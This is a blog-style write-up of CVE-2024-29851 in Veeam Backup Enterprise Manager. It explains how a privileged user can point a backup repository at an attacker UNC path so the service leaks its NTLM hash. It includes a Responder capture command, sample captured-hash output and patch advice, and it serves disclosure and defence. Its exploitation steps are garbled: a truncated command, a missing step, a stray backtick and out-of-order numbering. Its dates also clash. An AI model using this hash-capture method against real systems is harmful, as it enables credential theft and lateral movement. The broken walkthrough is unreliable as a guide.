CVE-2024-29851 - How Veeam Backup Enterprise Manager Can Leak NTLM Hashes

*Published: June 2024*


Veeam Backup & Replication is a super popular backup solution for virtual environments and critical infrastructure. If you use Veeam, you probably know about Veeam Backup Enterprise Manager (VBEM) — a web interface that centralizes management for multiple Veeam servers.

But in April 2024, a security advisory came out: CVE-2024-29851. This vulnerability can let a high-privilege user steal the NTLM hash of the Enterprise Manager’s service account. In this post, I’ll break down what’s going on, show you how it works (with code!), and explain what you need to do to stay safe.

What Is the Vulnerability? (CVE-2024-29851)

Summary:
By making the Veeam Backup Enterprise Manager service connect to a resource the attacker controls (like a network share), an attacker on the web interface (with high privileges) can cause the service to leak its account's NTLM hash. With this hash, attackers can try pass-the-hash attacks or brute-force to recover the plaintext password.

Why care?
The Enterprise Manager service often runs with lots of trust on your network. If an attacker gets their hands on this NTLM hash, they could escalate privileges or move laterally.

Stealing an NTLM Hash: The SMB Trap

NTLM hashes get “leaked” when Windows systems try to authenticate to remote network shares (for example, over SMB/CIFS). If the attacker can trick the service into accessing something like \\evilbox\share, Windows helpfully sends the service account’s NTLM hash as part of the “authentication” process.

So, we need a way to make Veeam Backup Enterprise Manager reach out to an attacker-controlled UNC path.

Vulnerable Feature: Add a Backup Repository

In Veeam Enterprise Manager, a privileged user can add or configure backup repositories. The attacker can supply a UNC path for a backup location — for example, \\attacker-ip\share. When Enterprise Manager tries to “validate” or “connect” to this path, it will authenticate… and leak its NTLM hash.

Exploitation in Practice

Let’s walk through this with real steps. This is for demonstration and defense purposes only.

You can use Responder (https://github.com/lgandx/Responder) on a Linux box

sudo responder -I eth

(This tool will answer to SMB requests and log incoming hashes.)

2. Add a Malicious Backup Repository

1. Open Veeam Enterprise Manager from a privileged account (something like “Portal Administrator”).

`

4. Save/apply. The manager will try to validate the path.

3. NTLM Hash Collected!

Responder will show output with the NTLM hash of the service account running the Veeam Backup Enterprise Manager server:

[SMB] NTLMv2-SSP Client : 192.168.56.123
[SMB] NTLMv2-SSP User   : DOMAIN\ServiceAccount
[SMB] NTLMv2-SSP Hash   : ServiceAccount::DOMAIN:...HASH DATA...

What Can Attackers Do With This Hash?

- Pass-the-Hash: Use the hash to authenticate as the service account on other systems, without knowing its password.

Risk and Impact

- You need to be a high-privilege user on the Enterprise Manager web interface (not a guest) but remember: if you have untrusted admins, or if one admin’s account is compromised, this is very dangerous.
- No “external attacker” exploit — this is not RCE or privilege escalation from no access. But it’s an easy way for a privileged but malicious insider to go from user to system pwner.

Patch and Mitigation

Veeam addressed this in version 12.1.2.172 and later.

UPDATE ASAP!

Veeam KB4594 - Cumulative Patch 12.1.2.172
- Restrict who can add/configure repositories to only trusted accounts.

References

- Veeam Security Advisory VEEAM-SA-2024-018
- CVE-2024-29851 NVD Details
- Responder SMB Hash Capture Tool
- Explanation of NTLM Relay Attacks

Conclusion

CVE-2024-29851 reminds us that “insider” or “administrator” attacks can be just as dangerous as external exploits. If you manage Veeam Enterprise Manager, double-check your user permissions, patch right away, and block unnecessary SMB traffic. Don’t make it easy for someone to collect the keys to your kingdom — the NTLM hash *is* a key!


Need a simpler summary?
If your Veeam is out of date and you let “trusted” users add repositories, they could trick it into giving away its password hash. Update now, keep an eye on privileged users, and treat your backup software as the prime target that it is.


*Written by an infosec pro for educational and defensive use. Stay secure!*

Timeline

Published on: 05/22/2024 23:15:09 UTC
Last modified on: 08/02/2024 01:17:58 UTC